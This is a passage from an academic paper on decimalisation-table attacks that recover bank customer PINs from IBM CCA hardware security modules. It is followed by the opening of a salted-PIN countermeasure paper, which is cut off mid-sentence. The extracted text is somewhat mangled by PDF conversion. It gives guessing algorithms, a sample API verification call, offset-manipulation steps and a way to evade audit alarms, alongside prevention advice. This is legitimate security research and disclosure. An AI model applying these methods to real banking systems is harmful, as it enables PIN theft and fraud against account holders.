adaptive +scheme which maximises the amount of information learned from each guess, and takes +an average of 15 guesses. Finally, a third scheme is presented which demonstrates that +the attack is still viable even when the attacker cannot control the guess against which +the PIN is matched. +Section 2 of the paper sets the attack in the context of a retail banking environment, +and explains why it may not be spotted by typical security measures. Section 3 de- +scribes PIN generation and veri(cid:12)cation methods, and section 4 describes the algorithms +we have designed in detail. We present our results from genuine trials in section 5, discuss +preventative measures in section 6, and draw our conclusions in section 7. +2 Banking Security +Banks have traditionally led the way in (cid:12)ghting fraud from both insiders and outsiders. +They have developed protection methods against insider fraud including double-entry +book-keeping, functional separation, and compulsory holiday periods for sta(cid:11), and they +recognise the need for regular security audits. These methods successfully reduce fraud +to an acceptable level for banks, and in conjunction with an appropriate legal framework +for liability, they can also protect customers against the consequences of fraud. +However, the increasing complexity of bank computer systems has not been accom- +panied by su(cid:14)cient development in understanding of fraud prevention methods. The +introduction of HSMs to protect customer PINs was a step in the right direction, but +even in 2002 these devices have not been universally adopted, and those that are used +have been shown time and time again not to be impervious to attack [1, 2, 5]. Typical +banking practice seeks only to reduce fraud to an acceptable level, but this translates +poorly into security requirements; it is impossible to accurately assess the security expo- +sure of a given (cid:13)aw, which could be an isolated incident or the tip of a huge iceberg. This +sort of risk management con(cid:13)icts directly with modern security design practice where ro- +bustness is crucial. There are useful analogues in the design of cryptographic algorithms. +Designers who make \just-strong-enough" algorithms and trade robustness for speed or +4 + +export approval play a dangerous game. The cracking of the GSM mobile phone cipher +A5 is but one example [3]. +And as \just-strong-enough" cryptographic algorithms continue to be used, the risk +of fraud from brute force PIN guessing is still considered acceptable, as it should take +at least 10 minutes to guess a single PIN at the maximum transaction rate of typical +modules deployed in the 80s. Customers are expected to notice the phantom withdrawals +and report them before the attacker could capture enough PINs to generate a signi(cid:12)cant +liability for the banks. Even with the latest HSMs that support a transaction rate ten +times higher, the sums of money an attacker could steal are small from the perspective +of a bank. +But now that the PIN decimalisation table has been identi(cid:12)ed as an security relevant +data item, and the attacks described in this paper show how to exploit uncontrolled access +to it, brute force guessing is over two orders of magnitude faster. Enough PINs to unlock +access to over $2 million can be stolen in one lunch break! +A more sinister threat is the perpetration of a smaller theft, where the necessary +transactions are well camou(cid:13)aged within the banks audit trails. PIN veri(cid:12)cations are +not necessarily centrally audited at all, and if we assume that they are, the 15 or so +transactions required will be hard for an auditor to spot amongst a stream of millions. +Intrusion detection systems do not fare much better { suppose a bank has an extremely +strict audit system that tracks the number of failed guesses for each account, raising +an alarm if there are three failures in a row. The attacker can discover a PIN without +raising the alarm by inserting the attack transactions just before genuine transactions +from the customer which will reset the count. No matter what the policies of the intrusion +detection system it is impossible to keep them secret, thus a competent programmer could +evade them. The very reason that HSMs were introduced into banks was that mainframe +operating systems only satisfactorily protected data integrity, and could not be trusted +to keep data con(cid:12)dential from programmers. +So as the economics of security (cid:13)aws like these develops into a mature (cid:12)eld, it seems +that banks need to update their risk management strategies to take account of the volatile +nature of the security industry. They also have a responsibility to their customers to +reassess liability for fraud in individual cases, as developments in computer security con- +tinually reshape the landscape over which legal disputes between bank and customer are +fought. +3 PIN Generation & Veri(cid:12)cation Techniques +There are a number of techniques for PIN generation and veri(cid:12)cation, each proprietary +to a particular consortium of banks who commissioned a PIN processing system from a +di(cid:11)erent manufacturer. The IBM CCA supports a representative sample, shown in Figure +2. We IBM 3624-O(cid:11)set method in more detail as it is typical of decimalisation table use. +3.1 The IBM 3624-O(cid:11)set PIN Derivation Method +The IBM 3624-O(cid:11)set method was developed to support the (cid:12)rst generation of ATMs and +has thus been widely adopted and mimicked. The method was designed so that o(cid:15)ine +ATMs would be able to verify customer PINs without needing the processing power and +5 + +Method Uses Dectables +IBM 3624 yes +IBM 3624-O(cid:11)set yes +Netherlands PIN-1 yes +IBM German Bank Pool Institution yes +VISA PIN-Validation Value +Interbank PIN +Figure 2: Common PIN calculation methods +storage to manipulate an entire database of customer account records. Instead, a scheme +was developed where the customer’s PIN could be calculated from their account number +by encryption with a secret key. The account number was made available on the magnetic +stripe of the card, so the ATM only needed to securely store a single cryptographic key. +An example PIN calculation is shown in Figure 4. +The account number is represented using ASCII digits, and then interpreted as a +hexadecimal input to the DES block cipher. After encryption with the secret \PIN gen- +eration" key, the output is converted to hexadecimal, and all but the (cid:12)rst four digits +are discarded. However, these four digits might contain the hexadecimal digits ‘A’-‘F’, +which are not available on a standard numeric keypad and would be confusing to cus- +tomers, so they are mapped back to decimal digits using a \decimalisation table" (Figure +3). +0123456789ABCDEF +0123456789012345 +Figure 3: A typical decimalisation table +Account Number 4556 2385 7753 2239 +Encrypted Accno 3F7C 2201 00CA 8AB3 +Shortened Enc Accno 3F7C +0123456789ABCDEF +0123456789012345 +Decimalised PIN 3572 +Public Offset 4344 +Final PIN 7816 +Figure 4: IBM 3624-O(cid:11)set PIN Generation Method +6 + +The example PIN of 3F7C thus becomes 3572. Finally, to permit the cardholders to +change their PINs, an o(cid:11)set is added which is stored in the mainframe database along +with the account number. When an ATM veri(cid:12)es an entered PIN, it simply subtracts +the o(cid:11)set from the card before checking the value against the decimalised result of the +encryption. +3.2 Hardware Security Module APIs +Bank control centres and ATMs use Hardware Security Modules (HSMs), which are +charged with protecting PIN derivation keys from corrupt employees and physical at- +tackers. An HSM is a tamper-resistant coprocessor that runs software providing crypto- +graphic and security related services. Its API is designed to protect the con(cid:12)dentiality +and integrity of data while still permitting access according to a con(cid:12)gurable usage policy. +Typical (cid:12)nancial APIs contain transactions to generate and verify PINs, translate guessed +PINsbetweendi(cid:11)erentencryptionkeysastheytravelbetweenbanks, andsupportawhole +host of key management functions. +The usage policy is typically set to allow anyone with access to the host computer +to perform everyday commands such as PIN veri(cid:12)cation, but to ensure that sensitive +functionssuchasloadingnewkeyscanonlybeperformedwithauthorisationfrommultiple +employees who are trusted not to collude. +IBM’s \Common Cryptographic Architecture" [6] is a (cid:12)nancial API implemented by a +range of IBM HSMs, including the 4758, and the CMOS Cryptographic Coprocessor (for +PCs and mainframes respectively). An example of the code for a CCA PIN veri(cid:12)cation +is shown in Figure 5. +Encrypted_PIN_Verify( +A_RETRES , A_ED , // return codes 0,0=yes 4,19=no +trial_pin_kek_in , pinver_key , // encryption keys for enc inputs +(UCHAR*)"3624 " "NONE " // PIN block format +" F" // PIN block pad digit +(UCHAR*)" " , +trial_pin , // encrypted_PIN_block +I_LONG(2) , +(UCHAR*)"IBM-PINO" "PADDIGIT" , // PIN verification method +I_LONG(4) , // # of PIN digits = 4 +"0123456789012345" // decimalisation table +"123456789012 " // PAN_data (account number) +"0000 " // offset data +); +Figure 5: Sample code for PIN veri(cid:12)cation in CCA +The crucial inputs to Encrypted_PIN_Verify are the decimalisation table, the +PAN_data, and the encrypted_PIN_block. The (cid:12)rst two are supplied in the clear and are +straightforward for the attacker to manipulate, but obtaining an encrypted_PIN_block +that represents a chosen trial PIN is rather harder. +7 + +3.3 Obtaining chosen encrypted trial PINs +Some bank systems permit clear entry of trial PINs from the host software. For instance, +this functionality may be required to input random PINs when generating PIN blocks +for schemes that do not use decimalisation tables. The appropriate CCA command is +Clear_PIN_Encrypt, which will prepare an encrypted PIN block from the chosen PIN. It +should be noted that enabling this command carries other risks as well as permitting our +attacks. If thereis notrandomisedpaddingof PINs before theyareencrypted, anattacker +could make a table of known trial encrypted PINs, compare each arriving encrypted PIN +against this list, and thus easily determine its value. If it is still necessary to enable clear +PIN entry in the absence of randomised padding, some systems can enforce that the clear +PINs are only encrypted under a key for transit to another bank { in which case the +attacker cannot use these guesses as inputs to the local veri(cid:12)cation command. +So, under the assumption that clear PIN entry is not available to the attacker, his +second option is to enter the required PIN guesses at a genuine ATM, and intercept the +encrypted PIN block corresponding to each guess as it arrives at the bank. Our adaptive +decimalisation table attack only requires (cid:12)ve di(cid:11)erent trial PINs { 0000 , 0001 ,0010 , +0100 , 1000. However the attacker might only be able to acquire encrypted PINs under +a block format such as ISO-0, where the account number is embedded within the block. +This would require him to manually input the (cid:12)ve trial PINs at an ATM for each account +that could be attacked { a huge undertaking which totally defeats the strategy. +A third and more most robust course of action for the attacker is to make use of the +PIN o(cid:11)set capability to convert a single known PIN into the required guesses. This known +PIN might be discovered by brute force guessing, or simply opening an account at that +bank. +Despite all these options for obtaining encrypted trial PINs it might be argued that +the decimalisation table attack is not exploitable unless it can be performed without a +singleknowntrialPIN.Toaddresstheseconcerns, wecreatedathirdalgorithm(described +in the next section), which is of equivalent speed to the others, and does not require any +known or chosen trial PINs. +4 Decimalisation Table Attacks +In this section, we describe three attacks. First, we present a 2-stage simple static scheme +which needs only about 24 guesses on average. The shortcoming of this method is that +it needs almost twice as many guesses in the worst case. We show how to overcome this +di(cid:14)culty by employing an adaptive approach and reduce the number of necessary guesses +to 22. Finally, we present an algorithm which uses PIN o(cid:11)sets to deduce a PIN from a +single correct encrypted guess, as is typically supplied by the customer from an ATM. +4.1 Initial Scheme +The initial scheme consists of two stages. The (cid:12)rst stage determines which digits are +present in the PIN. The second stage consists in trying all the possible pins composed of +those digits. +8 + +Let D be the original decimalisation table. For a given digit i, consider a binary +orig +decimalisation table D with the following property. The table D has 1 at position x if +i i +and only if D has the digit i at that position. In other words, +orig +1 if D [x] = i; +orig +D [x] = +i +(0 otherwise: +For example, for a standard table D = 0123456789012345, the value of D is +orig 3 +0001000000000100. +In the (cid:12)rst phase, for each digit i, we check the original PIN against the decimalisation +table D with a trial PIN of 0000. It is easy to see that the test fails exactly when the +i +original PIN contains thedigit i. Thus, using only at most 10 guesses, we have determined +all the digits that constitute the original PIN. +In the second stage we try every possible combination of those digits. Their actual +number depends on how many di(cid:11)erent digits the PIN contains. The table below gives +the details. +Digits Possibilities +A AAAA(1) +AB ABBB(4), AABB(6), AAAB(4) +ABC AABC(12), ABBC(12), ABCC(12) +ABCD ABCD(24) +The table shows that the second stage needs at most 36 guesses (when the original +PIN contains 3 di(cid:11)erent digits), which gives 46 guesses in total. The expected number of +guesses is, however, as small as about 23:5. +4.2 Adaptive Scheme +The process of cracking a PIN can be represented by a binary search tree. Each node v +contains a guess, i.e., a decimalisation table D and a pin p . We start at the root node +v v +and go down the tree along the path that is determined by the results of our guesses. Let +p be the original PIN. At each node, we check whether D (p ) = p . Then, we move +orig v orig v +to the right child if yes and to the left child otherwise. +Each node v in the tree can be associated with a list of original PINs such that +v +P +p if and only if v is reached in the process described in the previous paragraph if we +v +2 P +take p as the original PIN. In particular, the list associated with the root node contains +all possible pins and the list of each leaf should contain only one element: an original PIN +p . +orig +Consider the initial scheme described in the previous section as an example. For +simplicityassumethattheoriginalPINconsistsoftwobinarydigitsandthedecimalisation +table is trivial and maps 0 0 and 1 1. Figure 6 depicts the search tree for these +! ! +settings. +Themaindrawbackoftheinitialschemeisthatthenumberofrequiredguessesdepends +strongly on the original PIN p . For example, the method needs only 9 guesses for +orig +p = 9999 (because after ascertaining that digit 0{8 do not occur in p this is the only +orig orig +9 + +D (p)=? 00 +10 +yes no +p=11 D (p)=? 10 +01 +yes no +p=10 D (p)=? 01 +01 +yes no +p=01 p=00 +Figure 6: The search tree for the initial scheme. D denotes the decimalisation table +xy +that maps 0 x and 1 y. +! ! +possibility), but there are cases where 46 guesses are required. As a result, the search tree +is quite unbalanced and thus not optimal. +One method of producing a perfect search tree (i.e., the tree that requires the smallest +possible numbers of guesses in the worst case) is to consider all possible search trees and +choose the best one. This approach is, however, prohibitively ine(cid:14)cient because of its ex- +ponential time complexity with respect to the number of possible PINs and decimalisation +tables. +It turns out that not much is lost when we replace the exhaustive search with a simple +heuristics. We will choose the values of D and p for each node v in the following manner. +v v +Let be the list associated with node v. Then, we look at all possible pairs of D and +v v +P +p and pick the one for which the probability of D (p) = p for p is as close to 1 as +v v v 2 P v 2 +possible. This ensures that the left and right subtrees are approximately of the same size +so the whole tree should be quite balanced. +This scheme can be further improved using the following observation. Recall that the +original PIN p is a 4-digit hexadecimal number. However, we do not need to determine +orig +it exactly; all we need is to learn the value of p = D (p ). For example, we do not +orig orig +need to be able to distinguish between 012D and ABC3 because for both of them p = 0123. +It can be easily shown that we can build the search tree that is based on the value of p +instead of p provided that the tables D do not distinguish between 0 and A, 1 and B +orig v +and so on. In general, we require each D to satisfy the following property: for any pair +v +of hexadecimal digits x, y: D [x] = D [y] must imply D [x] = D [y]. This property +orig orig v v +is not di(cid:14)cult to satisfy and in reward we can reduce the number of possible PINs from +164 = 65536 to 104 = 10000. Figure 7 shows a sample run of the algorithm for the +original PIN p = 3491. +orig +4.3 PIN O(cid:11)set Adaptive Scheme +When the attacker does not know any encrypted trial PINs, and cannot encrypt his own +guesses, he can still succeed by manipulating the o(cid:11)set parameter used to compensate for +customer PIN change. Our (cid:12)nal scheme has the same two stages as the initial scheme, so +10 + +No Possible pins Decimalisation table D Trial pin p D (p ) p =? D (p ) +v v v orig v v orig +1 10000 1000001000100000 0000 0000 yes +2 4096 0100000000010000 0000 1000 no +3 1695 0111110000011111 1111 1011 no +4 1326 0000000100000000 0000 0000 yes +5 736 0000000010000000 0000 0000 yes +6 302 0010000000001000 0000 0000 yes +7 194 0001000000000100 0000 0001 no +8 84 0000110000000011 0000 0010 no +9 48 0000100000000010 0000 0010 no +10 24 0100000000010000 1000 1000 yes +11 6 0001000000000100 0100 0001 no +12 4 0001000000000100 0010 0001 no +13 2 0000100000000010 0100 0010 no +Figure 7: Sample output from adaptive test program +our (cid:12)rst task is to determine the digits present in the PIN. +Assume that an encrypted PIN block containing the correct PIN for the account has +been intercepted (the vast majority of arriving encrypted PIN blocks will satisfy this +criterion), and for simplicity that the account holder has not changed his PIN and the +correct o(cid:11)set is 0000. Using the following set of decimalisation tables, the attacker can +determine which digits are present in the correct PIN. +D [x]+1 if D [x] = i; +orig orig +D [x] = +i +(D +orig +[x] otherwise: +For example, for D = 0123456789012345, the value of D is 0124456789012445. +orig 3 +He supplies the correct encrypted PIN block and the correct o(cid:11)set each time. +As with the initial scheme, the second phase determines the positions of the digits +present in the PIN, and is again dependent upon the number of repeated digits in the +originalPIN.ConsiderthecommoncasewhereallthePINdigitsaredi(cid:11)erent, forexample +1583. We can try to determine the position of the single 8 digit by applying an o(cid:11)set to +di(cid:11)erent digits and checking for a match. +Guess Guess Customer Customer Guess Decimalised Verify +O(cid:11)set Decimalisation Table Guess + Guess O(cid:11)set Original PIN Result +0001 0123456799012345 1583 1584 1593 no +0010 0123456799012345 1583 1593 1593 yes +0100 0123456799012345 1583 1683 1593 no +1000 0123456799012345 1583 2583 1593 no +Each di(cid:11)erent guessed o(cid:11)set maps the customer’s correct guess to a new PIN which +may or may not match the original PIN after it is decimalised using the modi(cid:12)ed table. +This procedure is repeated until the position of all digits is known. Cases with all digits +di(cid:11)erent will require at most 6 transactions to determine all the position data. Three +11 + +di(cid:11)erent digits will need a maximum of 9 trials, two digits di(cid:11)erent up to 13 trials, and +if all the digits are the same no trials are required as there are no permutations. When +the parts of the scheme are assembled, 16.5 guesses are required on average to determine +a given PIN. +5 Results +We (cid:12)rst tested the adaptive algorithm exhaustively on all possible PINs. The distribution +in Figure 8 was obtained. The worst case has been reduced from 45 guesses to 24 guesses, +and the average has fallen from 24 to 15 guesses. We then implemented the attacks +on the IBM Common Cryptographic Architecture (version 2.41, for the IBM 4758), and +successfully extracted PINs generated using the IBM 3624 method. We also checked the +attacks against the API speci(cid:12)cations for the VISA Security Module (VSM) , and found +them to be e(cid:11)ective. The VSM is the forerunner of a whole range of hardware security +modules for PIN processing, and we believe that the attacks will also be e(cid:11)ective against +many of its successors. +2500 +2000 +1500 +1000 +500 +0 +0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 +Number of Attempts +sNIP +fo +rebmuN +Figure 8: Distribution of guesses required using adaptive algorithm +12 + +6 Prevention +It is easy to perform a check upon the validity of the decimalisation table. Several +PIN veri(cid:12)cation methods that use decimalisation tables require that the table should +be 0123456789012345 for the algorithm to function correctly, and in these cases the API +need only enforce this requirement to regain security. However, PIN veri(cid:12)cation methods +that support proprietary decimalisation tables are harder to (cid:12)x. A checking procedure +that ensures a mapping of the input combinations to the maximum number of possible +output combinations will protect against the (cid:12)rst two decimalisation table attacks, but +not against the attack which exploits the PIN o(cid:11)set and uses only minor modi(cid:12)cations to +the genuine decimalisation table. To regain full security, the decimalisation table input +must be cryptographically protected so that only authorised tables can be used. +The only short-term alternative to the measures above is to use more advanced in- +trusion detection measures, and it seems that the long term message is clear: continuing +to support decimalisation tables is not a robust approach to PIN veri(cid:12)cation. Unskewed +randomly generated PINs stored encrypted in an online database such as are already used +in some banks are signi(cid:12)cantly more secure. +7 Conclusions +WearecurrentlystartingdiscussionswithHSMmanufacturerswithregardtothepractical +implications of the attacks. It is very costly to modify the software which interacts with +HSMs, andwhile updateof theHSMsoftware is cheaper, thesystemwill still needtesting, +and the update may involve a costly re-initialisation phase. Straightforward validity +checking for decimalisation tables should be easy to implement, but full protection that +retains compatibility with existing mainframe software will be hard to achieve. It will +depend upon the intrusion detection capabilities o(cid:11)ered by each particular manufacturer. +We hope to have a full understanding of the impact of these attacks and of the optimal +preventative measures in the near future. +Although HSMs have existed for two decades, formal study of their security APIs is +still in its infancy. Previous work by one of the authors [5, 4] has uncovered a whole +host of diverse (cid:13)aws in APIs, some at the protocol level, some exploiting properties of +the underlying crypto algorithms, and some exploiting poor design of procedural controls. +The techniques behind the decimalisation table attacks do not just add another string +to the bow of the attacker { they further con(cid:12)rm that designing security APIs is one +of the toughest challenges facing the security community. It is hard to see how any +one methodology for gaining assurance of correctness can provide worthwhile guarantees, +given the diversity of attacks at the API level. More research is needed into methods +for API analysis, but for the time being we may have to concede that writing correct +API speci(cid:12)cations is as hard as writing correct code, and enter the traditional arms race +between attack and defence that so many software products have to (cid:12)ght. +13 + +Acknowledgements +WewouldliketothankRichardClaytonandRossAndersonfortheirhelpfulcontributions +and advice. Mike Bond was able to conduct the research thanks to the funding received +fromtheUKEngineeringandPhysicalResearchCouncil(EPSRC)andMarconiplc. Piotr +Zielin(cid:19)ski was supported by a Cambridge Overseas Trust Scholarship combined with an +ORS Award, as well as by a Thaddeus Mann Studentship from Trinity Hall College. +References +[1] R. Anderson: Why Cryptosystems Fail Communications of the ACM, 37(11), pp32{ +40 (Nov 1994) +[2] R. Anderson: The Correctness of Crypto Transaction Sets Proc. Cambridge Security +Protocols Workshop 2000 LNCS 2133, Springer-Verlag, pp 125{127 (2000) +[3] A. Biryukov, A. Shamir, D. Wagner Real Time Cryptanalysis of A5/1 on a PC +Proceedings of Fast Software Encryption 2000 +[4] M. Bond, R. Anderson API-Level Attacks on Embedded Systems IEEE Computer +Magazine, October 2001, pp 67{75 +[5] M. Bond: Attacks on Cryptoprocessor Transaction Sets Proc. Workshop Crypto- +graphic Hardware and Embedded Systems (CHES 2001),LNCS2162,Springer-Verlag, +pp 220{234 (2001) +[6] IBM Inc.: IBM 4758 PCI Cryptographic Coprocessor CCA Basic Services Reference +and Guide for the IBM 4758-001, Release 1.31. IBM, Armonk, N.Y. (1999) +http://www.ibm.com/security/cryptocards/bscsvc02.pdf +14 diff --git a/PIN Cracking-comsec-09_pdf.md b/PIN Cracking-comsec-09_pdf.md new file mode 100644 index 0000000..a507897 --- /dev/null +++ b/PIN Cracking-comsec-09_pdf.md @@ -0,0 +1,627 @@ +# PIN Cracking-comsec-09 + + +--- + +Weighing Down +⋆ +“The Unbearable Lightness of PIN Cracking” (Extended Version) +Mohammad Mannan and P.C. van Oorschot +School of Computer Science +Carleton University,Ottawa, Canada +Abstract. Responding to the PIN cracking attacks from Berkman and Ostrovsky (FC 2007), we outline a +simplesolutioncalled salted-PIN.Arandomlygeneratedsaltvalueofadequatelength(e.g.128-bit)isstoredon +abankcardinplaintext,andinanencryptedformataverificationfacilityunderabank-chosensaltkey.Instead +of sending the regular user PIN, salted-PIN requires an ATM to generate a Transport Final PIN from a user +PIN, account number, and the salt value (stored on the bank card) through, e.g., a pseudo-random function. +Weexploredifferentattackson thissolution, and proposethreevariantsofsalted-PIN that can protectagainst +known attacks. Depending on the solution variation, attacks at a malicious intermediate switch now may only +revealtheTransportFinalPIN;boththeuserPINandsaltvalueremainbeyondthereachofanattacker’sswitch. +Salted-PIN requires modifications to service points (e.g. ATM, point-of-sale), issuer/verification facilities, and +bank cards; however,changes tointermediate switches are not required. +1 Introduction +Attacks on financial PIN processing APIs revealing customers’ PINs have been known to banks and security re- +searchers for years, e.g., [10], [6], [8], [9], [7] (failure modes of ATM PIN encryption were first discussed in An- +derson [2]). Apparently the most efficient of these ‘PIN cracking’ attacks are due to Berkman and Ostrovsky [4].1 +However,proposalstocountersuchattacksarealmostnon-existentintheliterature,otherthanafewsuggestions;for +example,maintainingthesecrecy(andintegrity)ofsomedataelementsrelatedtoPINprocessing(thatareconsidered +security insensitive according to current banking standards)such as the ‘decimalization table’ and ‘PIN Verification +Values (PVVs)/Offsets’ has been emphasized [8], [4]. However, implementing these suggestions requires modifica- +tions to all involvedparties’ HardwareSecurity Modules (HSMs). Commercial solutions such as the PrivateServer +Switch-HSM[1]relymostlyon‘tightly’controllingthe keyuploadingprocesstoaswitchandremoving‘unnecessary’ +APIs or weak PIN block formats. Even if the flawed APIs are fixed, or non-essential attack APIs are removed to +preventthese attacks,it may be difficult in practice to ensure that all intermediate (third-party controlled)switches +areupdated accordingly.Thus banks relymainly onprotectionmechanisms providedwithin banking standards,and +policy-based solutions, e.g., mutual banking agreements to protect customer PINs. +A solution such as Mobile Password Authentication (MP-Auth) [13] is apparently capable of preventing these +attacks in addition to saving PINs from false ATM keypads and card reader attacks. However, MP-Auth relies +on public key operations, and thus cannot be deployed without significant modifications to ATMs, switches and +verificationfacilities. Another obvioussolution(as suggestedin [8],[4]) is to update the PINprocessingAPIs,which +2 +alsorequires modifications to all involvedparties’HardwareSecurity Modules (HSMs). Evenif the flawedAPIs are +fixed, or non-essentialattack APIs are removed(as in ARX PrivateServerHSM [1]) to preventthese attacks,it may +be difficult in practice to ensure that all intermediate (third-party controlled) switches are updated accordingly. +Designing solutions to mitigate PIN cracking attacks pose some interesting challenges. PIN transfers in banking +networks rely on symmetric key cryptography where the third-party controlled intermediate switches also possess +shared keys to decrypt encrypted PINs (although have no access to issuer/verification keys). Although decrypted +PINs (and the decryption key itself) are not (ideally) accessible from outside of an HSM, API flaws allow attackers +to realistically extract enough information from the HSM (through ‘legitimate’ API calls) that enable PIN cracking +attacks. Thus PIN cracking solutions must protect user PINs travel through third-party switches which may be less +security conscious or even actively malicious. Our solution attempts to address threats from such an adversary as +⋆ Version:April29,2008.Contactauthor:mmannan@scs.carleton.ca. A5-pageversionofthismanuscripthasbeenaccepted +as a short paper in Financial Cryptography and Data Security (FC) 2008. +1 We encourage readers unfamiliar with financial PIN processing APIs and PIN cracking attacks to consult Section 2 for +background,and Section 7 for a summary of attacks by Berkman and Ostrovsky[4]. +2 For an overview of HSMsand related attacks, see Anderson et al. [3] + +2 +wellashostilepartiesataverificationfacilitywithlimitedaccess(e.g.onewhocancallAPIfunctions fromanHSM, +but cannotaccessverificationkeys).However,we do not considerATM frauds suchas false keypadsandcardreader +attacks that are not scalable. +One primary reason that PIN cracking attacks are possible is that actual user PINs, although encrypted, travel +from ATMs to a verification facility through several (untrustworthy) intermediate switches. If, for example, hashed +PINsweresentinanencryptedform,attackersmaynotbeabletorevealuserPINseveninthepresenceofAPIflaws. +However, as PINs are generally short (4 digits), an offline dictionary attack may still easily allow recovery of actual +PINs. From reviewing the history of API attacks, we also note that even a complete overhauling of PIN processing +APIsmaybesubjecttopresently-unknownAPIflawsthatmightbeexploitedtorevealuserPINs.Thereforeweseek +a solution that precludes real user PINs being extracted at verification facilities, and especially at switches (which +are beyondthe controlof issuing banks),even in the presence of API flaws.One possible solutionin this directionis +not to send the actual user PIN itself through untrusted intermediate nodes. Our proposal follows such a direction. +While PIN cracking attacks get more expensive as the PIN length increases, it is unrealistic to consider larger +(e.g. 12-digit)user PINs,for usability reasons.3 As part of our proposal,we assume that a unique randomsalt value +ofsufficientlength(e.g.128bits)isstoredonauser’sbankcard,andusedalongwiththeuser’sregularfour-digitPIN +(‘FinalPIN’)togenerate4 alarger(e.g.12digits)Transport Final PIN (TFP).ThisTFPisthenencryptedandsent +throughthe intermediate switches.Thus we essentially expandthe 4-digitPINto 12digits. We build our salted-PIN +solution on this simple idea. Our proposal requires updating bank cards (magnetic-stripe/chip card), service-points +(e.g.ATMs),andissuer/verificationHSMs.However,ourdesigngoalisto avoidchanginganyintermediate switches, +or requiring intermediate switches be trusted or compliant to anything beyond existing banking standards. +Salted-PIN provides the following benefits. +1. Itdoesnotdependonpolicy-basedassumptions,andlimitsexistingPINcrackingattacksevenwhereintermediate +switches are malicious. +2. It significantly increases the cost of launching known PIN cracking attacks; for example, the setup cost for the +translate-onlyattackforbuildingacompleteEncryptedPINBlock(EPB)tablenowrequiresmorethanatrillion +API calls in contrast to 10,000 calls as in Berkman and Ostrovsky [4]. +3. Incorporating service-point specific information such as ‘card acceptor identification code’ and ‘card acceptor +name/location’ (as in ISO 8583) into variants of salted-PIN, we further restrict attacks to be limited to a +particular location/ATM. +Organization.BackgroundonfinancialPINprocessingisprovidedinSection2.Weoutlinetheproposedsalted-PIN +solution in Section 3. Known attacks against the basic versionof salted-PIN are discussed in Section 4. In Section 5 +we introduce three variants of salted-PIN to counter these attacks. Implementation challenges to salted-PIN are +briefly discussed in Section 6. In Section 7, we review several (representative) attacks as outlined by Berkman and +Ostrovsky [4]. Section 8 concludes. +2 Background +In this section, we provide a basic overviewof PIN processing and PIN block formats. More backgroundon banking +networks is discussed elsewhere (e.g. [10], [14]). +PINProcessingArchitecture.WhenauserinputsherPINatanATM,thePINisencryptedtoformanEncrypted +PIN Block (EPB) using a transport key shared between the ATM and the next switch connected to the ATM. A +switch can be a stand-alone facility for PIN transportation (and other related bank network activities), or part of a +bank’s verification facility. PIN blocks are processed inside Hardware Security Modules (HSMs). Each switch shares +a transport key with other switches that it is connected to. At a verification center, a switch may also have the +issuerkey(forPINverification).AstandardizedsetofPINprocessingAPIsisusedforPINcreation,transportation, +and verification.The intent is that this allows banks to protect user PINs from applicationprogrammers(or anyone +having access to PIN processing APIs) at verification facilities as well as in switches. +There are several standardized PIN block formats (see below). An EPB may travel across several HSMs on its +way to a verificationsite. When transmitted fromone HSM to another, re-formatting (i.e. translating from one PIN +3 A 12-digit PIN can be constructed bystoring eight digits on thebank card while a usermemorizes theotherfour digits as +usual. However, as thereal PIN is sent encryptedin thissolution, attackers at amalicious switch can recover thePIN and +createfakecards.(AnanonymousFC2008refereepointedthissolutionanditsrelativeadvantagesanddisadvantages to us.) +4 For example, through a pseudo-randomfunction (PRF). + +3 +block format to another) may be required. Thus all HSMs must implement translation APIs to allow reformatting +of an EPB. A switch decrypts an EPB, checks the PIN block format (e.g. validity of PIN digits, PIN length), +changes the format if required, and re-encrypts the PIN block with the destination switch’s transport key. As all +PIN operations are performed by HSMs, an application programmer (ideally) cannot learn anything about PINs +transported as EPBs. +PAN +PIN Key Encrypt PAN +(issuer) +Decimalization +Table Decimalize the encrypted PAN +Natural PIN (4 leftmost digits) +EPB +PIN block Decrypt EPB and extract +format Transport Final PIN +Key +Final PIN - Natural PIN +Offset +Fig.1. Offset calculation (adapted from [14]) +PIN Block Formats. We outline four PIN block formats from ISO 9564-1 [12], three of which are approved by +VISA for online transactions (e.g. through ATMs). Assume that a PIN is four decimal digits long. A PIN block +is composed of 16 hex digits, i.e., 64-bits. Let ‘P’ be a PIN digit (0 to 9), PAN the least significant 12 digits of a +customer’sPrimaryAccountNumber (excluding the checkdigit), andlet‘A’be a PANdigit(0 to 9).AnISO-0PIN +block is calculated as follows. +ISO-0 PIN Block=Original PIN Block⊕Formatted PAN +Here, Original PIN Block=04 PPPP FFFF FFFF FF, +with ‘F’ denoting the hex digit F +Formatted PAN Block=00 00AA AAAA AAAA AA +The leftmost zero in the original PIN block stands for ISO-0, and the digit 4 is the PIN length (which could be +ashighas12).AnISO-0PINblock is the resultofXORing anoriginalPINblock withaformattedPAN.The ISO-1 +PIN Block format is 14 PPPP RRRR RRRR RR, where ‘R’ is a random hex digit (0 to F). The ISO-2 PIN Block format +is 24 PPPP FFFF FFFF FF, which is used only when creating a card. An ISO-3 PIN block is calculated as follows. +ISO-3 PIN Block=Formatted PIN Block⊕Formatted PAN +Here, Formatted PIN Block=34 PPPP RRRR RRRR RR, +with ‘R’ a hex digit from A to F +Formatted PAN Block=00 00AA AAAA AAAA AA +Insummary,ISO-2is the weakestPINformat;it is not allowedfor online processing,and ithas not beenused in +the PIN cracking attacks. ISO-0 and ISO-3 PIN blocks depend on a user PIN and account number. ISO-1 format is +not bound to a user’s account number, and is recommended to be used in situations where the PAN is unavailable. +Attacks exploiting translate-only APIs (see Section 7.1) depend on the fact that any ISO-0 and ISO-3 PIN formats +canbetranslatedtothelesssecureISO-1format(astheISO-1formatdoesnotdependontheuserPAN).Translation +APIs are also generally implemented by all HSMs. + +4 +IBM Calculate-Offset API. IBM’scalculate-offsetAPIoutputs anoffsetusinga PANandEPB.If the calculated +offset value correspondsto the stored value for that PAN, then the PIN inside the EPB is verified. Offset values are +assumed by the banking standards to be security insensitive, and are generally stored in plaintext. Fig. 1 illustrates +how anoffsetvalue is calculatedforPINverification.Here,a Natural PIN is calculatedfromacustomer’s PAN,and +the Final PIN is a customer-chosen PIN. Subtraction is digit by digit modulo 10. An issuer key (residing inside an +HSM) is used to encrypt a user’s PAN. The encrypted PAN may contain hex digits (A to F), and it is decimalized +using a decimalization table (mapping hex digits to decimal digits). The four left-most digits of the decimalized +encryptedPANconstitutetheuser’sNaturalPIN.TheFinalPINisextractedfromtheuser’sPAN,EPB(containing +the user’s encrypted Final PIN), the 